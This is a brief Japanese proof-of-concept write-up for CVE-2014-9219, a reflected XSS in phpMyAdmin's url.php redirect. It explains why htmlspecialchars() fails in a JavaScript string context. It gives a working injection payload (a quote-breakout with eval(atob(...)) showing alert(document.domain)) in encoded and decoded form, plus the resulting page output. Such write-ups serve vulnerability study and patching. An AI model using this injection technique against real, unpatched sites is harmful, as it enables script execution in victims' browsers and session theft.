
CVE-2014-9219 XSS POC
CVE-2014-9219 XSS POC
この脆弱性は、phpMyAdmin 4.2.x (4.2.13.1 未満) の url.php におけるリダイレクション機能の入力検証エラーが原因で、url パラメータの処理時に発生します。リモートの攻撃者は、被害者に特別に細工されたリンクを踏ませることで、被害者のブラウザ上で任意の HTML およびスクリプトコードを脆弱なウェブサイトのセキュリティコンテキストで実行させる可能性があります。
phpMyAdmin: 4.2.0 - 4.2.13
脆弱なコードは、htmlspecialchars() を使用して URL パラメータをサニタイズしてから JavaScript 文字列コンテキストに挿入しています。
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() は HTML コンテキスト向けに設計されており、JavaScript 文字列コンテキストには適していません。JavaScript 文字列リテラルから抜け出すことができる文字を適切にエスケープしません。
url encoded:
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
url decoded:
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
HTML Output:
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.